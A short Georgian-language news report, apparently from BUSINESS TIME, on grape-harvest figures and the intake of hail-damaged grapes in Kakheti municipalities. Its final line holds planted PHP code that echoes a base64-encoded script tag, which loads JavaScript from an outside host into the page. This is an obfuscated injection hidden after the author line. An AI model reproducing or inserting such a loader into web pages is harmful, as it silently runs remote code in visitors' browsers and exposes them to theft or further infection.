celsiusi
ავერსი შნაიდერი
ყურძნის გადამუშავების პროცესში ჩართულია 50-მდე ღვინის საწარმო. როგორც საინფორმაციო სააგენტო BUSINESS TIME-ს ღვინის ეროვნული სააგენტოდან აცნობეს, გადამუშავებული ყურძნიდან 14 ათას ტონამდე რქაწითელი, 10 ათას ტონამდე საფერავი, 1,1 ათასი ტონა კახური მწვანე და დანარჩენი სხვადასხვა ჯიშის ყურძენია. მოსავალი ღვინის საწარმოებს 2700-ზე მეტმა მევენახემ ჩააბარა.
 
მათივე ცნობით, რთველის საკოორდინაციო შტაბში დარეგისტრირებულია 260 ღვინის კომპანია, რომლებიც ეტაპობრივად ჩაერთვებიან რთველის პროცესში.
 
"შეუფერხებლად მიმდინარეობს 2 სექტემბერს მოსული სეტყვითა და ძლიერი ქარის შედეგად დაზიანებული ყურძნის ჩაბარება. სახელმწიფო ღვინის საწარმოს შპს " მოსავლის მართვის კომპანიის " მიერ გადამუშავებულია 3077 ტონა დაზიანებული ყურძენი. მევენახეები შპს " მოსავლის მართვის კომპანიას" დაზიანებულ ყურძენს 90 თეთრად აბარებენ. დასეტყვილი ყურძნის ჩაბარება დღეს 6 ლოკაციაზე მიმდინარეობს შემდეგ მუნიციპალიტეტებში: თელავი (2 ლოკაცია), სიღნაღი, ყვარელი და გურჯაანი (2 ლოკაცია)" - წერია ინფორმაციაში.
ავტორი
მირანდა შურღაია
729
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");